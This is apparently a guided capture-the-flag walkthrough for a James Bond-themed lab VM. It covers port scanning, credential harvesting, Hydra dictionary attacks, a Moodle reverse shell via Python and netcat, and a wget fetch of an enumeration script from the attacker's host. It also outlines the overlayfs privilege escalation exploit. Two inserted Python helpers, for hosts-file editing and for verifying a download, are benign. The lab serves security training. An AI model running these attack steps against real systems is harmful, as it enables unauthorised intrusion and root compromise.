This room is a guided challenge: hack the James Bond-styled box and get root.
Credit to creosote for creating this VM. This machine is used here with the explicit permission of the creator <3
So.. Let's get started!
First things first, connect to our network and deploy the machine.
Use nmap to scan all ports on the machine. How many ports are open?
Take a look at the website, dive into the source code too, and remember to inspect all scripts!
Who needs to make sure they update their default password?
What's their password?
Now go use those credentials and login to a part of the site.
Onto the next steps..
Take a look at some of the other services you found using your nmap scan. Are the credentials you have reusable?
If those creds don't seem to work, can you use another program to find other users and passwords? Maybe Hydra? What's their new password?
Inspect port 55007, what service is configured to use this port?
Login using that service and the credentials you found earlier.
What can you find on this service?
What user can break Boris' codes?
Using the users you found on this service, find other users' passwords.
Keep enumerating users using this service and keep attempting to obtain their passwords via dictionary attacks.
Enumeration really is key. Making notes and referring back to them can be lifesaving. We shall now go onto getting a user shell.
If you remember, some of the emails you discovered mention the severnaya-station.com website. To get it working, you need to update your DNS records (your local hosts file) so the name resolves to the machine.
If you're on Linux edit your "/etc/hosts" file and add:
<machines ip> severnaya-station.com
If you're on Windows, do the same but in the "c:\Windows\System32\Drivers\etc\hosts" file.
Once you have done that, in your browser navigate to: http://severnaya-station.com/gnocertdir
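The hosts-file step above is easy to get wrong when a VM is redeployed with a new address and a stale line is left behind (the resolver takes the first match, so the old IP keeps winning). The helper below is an added example, not part of the room: it adds or updates a mapping idempotently in any hosts-format file you point it at, validates the IP first, and returns what it did. The file path, IP and hostname in `demo()` are constructed values; on a real box you would pass `/etc/hosts` (needs root) and the machine's actual IP.

```python
"""Idempotently add or update a hostname mapping in a hosts-format file (added example)."""
import ipaddress
import tempfile
from pathlib import Path


def upsert_hosts_entry(hosts_path, ip, hostname):
    """Ensure `hostname` resolves to `ip` in the file at `hosts_path`.

    Returns "added", "updated" or "unchanged". A bad IP raises ValueError
    instead of silently writing a bogus line. If the hostname already maps to
    a different address, that stale mapping is removed so the new line is the
    one the resolver sees.
    """
    ip_str = str(ipaddress.ip_address(ip))  # ValueError on garbage input
    path = Path(hosts_path)
    lines = path.read_text().splitlines() if path.exists() else []
    out, action = [], "added"
    for line in lines:
        code, _, comment = line.partition("#")
        tokens = code.split()
        if len(tokens) >= 2 and hostname in tokens[1:]:
            if tokens[0] == ip_str:
                return "unchanged"          # nothing to do, do not rewrite the file
            action = "updated"
            remaining = [t for t in tokens[1:] if t != hostname]
            if remaining:                   # keep other names that shared the line
                kept = " ".join([tokens[0], *remaining])
                out.append(kept + (" #" + comment if comment else ""))
            continue
        out.append(line)
    out.append(f"{ip_str} {hostname}")
    path.write_text("\n".join(out) + "\n")
    return action


def resolve_from_hosts(hosts_path, hostname):
    """Return the first address mapped to `hostname`, the way the resolver would."""
    for line in Path(hosts_path).read_text().splitlines():
        tokens = line.partition("#")[0].split()
        if len(tokens) >= 2 and hostname in tokens[1:]:
            return tokens[0]
    return None


def demo():
    """Run the add / repeat / redeploy sequence against a temp file (constructed data)."""
    hosts = Path(tempfile.mkdtemp()) / "hosts"
    hosts.write_text("127.0.0.1 localhost\n")
    first = upsert_hosts_entry(hosts, "10.10.10.5", "severnaya-station.com")   # constructed IP
    second = upsert_hosts_entry(hosts, "10.10.10.5", "severnaya-station.com")
    third = upsert_hosts_entry(hosts, "10.10.20.9", "severnaya-station.com")   # VM redeployed
    return first, second, third, resolve_from_hosts(hosts, "severnaya-station.com")


if __name__ == "__main__":
    print(demo())  # ('added', 'unchanged', 'updated', '10.10.20.9')
```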
Try using the credentials you found earlier. Which user can you log in as?
Have a poke around the site. What other user can you find?
What was this user's password?
Use this users credentials to go through all the services you have found to reveal more emails.
What is the next user you can find from doak?
What is this user's password?
Take a look at their files on the Moodle (severnaya-station.com).
Download the attachments and see if there are any hidden messages inside them?
Using the information you found in the last task, login with the newly found user.
As this user has more site privileges, you are able to edit Moodle's settings. From here, get a reverse shell using Python and netcat.
Take a look at Aspell, the spell checker plugin.
Now that you have enumerated enough to get an administrative Moodle login and gain a reverse shell, it's time to escalate privileges.
Download linuxprivchecker to enumerate installed development tools.
To get the file onto the machine you will need to wget it from your local machine, as the VM cannot reach the internet. Follow these steps to get a file onto the VM:
- Download the linuxprivchecker file locally
- Navigate to the file on your file system
- Do: python -m SimpleHTTPServer 1337 (leave this running; on Python 3 the equivalent is python3 -m http.server 1337)
- On the VM you can now do: wget http://<your IP>:1337/<file>.py
OR
Enumerate the machine manually.
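The staging step above (a throwaway HTTP server on your box, `wget` on the target) is also where a truncated or wrong file quietly ends up on the VM. The example below is added here and is not the room's or linuxprivchecker's code: it reproduces that transfer with only the Python standard library on the loopback interface, and adds the check a careful operator makes, comparing the downloaded copy's SHA-256 against the hash recorded before serving and deleting the copy on mismatch. The served file is a constructed stand-in for the real script; the hostname, port and paths in `demo()` are constructed too.

```python
"""Serve a directory over HTTP, fetch a file, and verify its SHA-256 (added example)."""
import hashlib
import tempfile
import threading
import urllib.request
from functools import partial
from http.server import HTTPServer, SimpleHTTPRequestHandler
from pathlib import Path


def sha256_of(path):
    """Hex SHA-256 of a file, read in chunks so large tools do not load into memory."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


class QuietHandler(SimpleHTTPRequestHandler):
    """SimpleHTTPRequestHandler without per-request log lines on stderr."""
    def log_message(self, fmt, *args):
        pass


def serve_directory(directory, host="127.0.0.1", port=0):
    """Serve `directory` read-only in a daemon thread; returns (server, bound_port).
    port=0 asks the OS for a free port, the same role 1337 plays in the room's command."""
    handler = partial(QuietHandler, directory=str(directory))
    server = HTTPServer((host, port), handler)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server, server.server_address[1]


def fetch_and_verify(url, dest, expected_sha256, timeout=10):
    """Download `url` to `dest`. Returns True only if the hash matches; on mismatch
    the partial/wrong file is removed so it cannot be run by accident."""
    with urllib.request.urlopen(url, timeout=timeout) as resp, open(dest, "wb") as out:
        while True:
            chunk = resp.read(65536)
            if not chunk:
                break
            out.write(chunk)
    if sha256_of(dest) != expected_sha256:
        Path(dest).unlink(missing_ok=True)
        return False
    return True


def demo():
    """Stage a constructed stand-in script and transfer it to a second directory that
    plays the target. Returns (good_copy_verified, bad_hash_rejected_and_removed)."""
    src_dir = Path(tempfile.mkdtemp())
    dst_dir = Path(tempfile.mkdtemp())
    tool = src_dir / "tool.py"
    tool.write_bytes(b"print('constructed stand-in for an enumeration script')\n")
    digest = sha256_of(tool)  # record this on your own box BEFORE serving
    server, port = serve_directory(src_dir)
    try:
        url = f"http://127.0.0.1:{port}/tool.py"
        ok = fetch_and_verify(url, dst_dir / "tool.py", digest)
        bad = dst_dir / "tool2.py"
        rejected = (not fetch_and_verify(url, bad, "0" * 64)) and not bad.exists()
    finally:
        server.shutdown()
        server.server_close()
    return ok, rejected


if __name__ == "__main__":
    print(demo())  # (True, True)
```

On the real engagement the two halves run on different hosts: `sha256sum` the file locally, serve it, and after `wget` on the target run `sha256sum` there and compare by eye; the Python above just packages that comparison so it can be exercised end to end on one machine.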
What's the kernel version?
This machine is vulnerable to the overlayfs exploit. The exploitation is technically very simple:
- Create new user and mount namespace using clone with CLONE_NEWUSER|CLONE_NEWNS flags.
- Mount an overlayfs using /bin as lower filesystem, some temporary directories as upper and work directory.
- The overlayfs mount would only be visible within the user namespace, so let the namespace process change its CWD to the overlayfs, making the overlayfs also visible outside the namespace via the proc filesystem.
- Make su on the overlayfs world-writable without changing the owner.
- Let a process outside the user namespace write arbitrary content to the file, applying a slightly modified variant of the SetgidDirectoryPrivilegeEscalation exploit.
- Execute the modified su binary
You can download the exploit from here: https://www.exploit-db.com/exploits/37292
Fix the exploit to work with the system you're trying to exploit. Remember, enumeration is key!
What development tools are installed on the machine?
What is the root flag?
Room Type: Free Room. Anyone can deploy virtual machines in the room (without being subscribed)!
Users in Room: 22,151
Created: 2388 days ago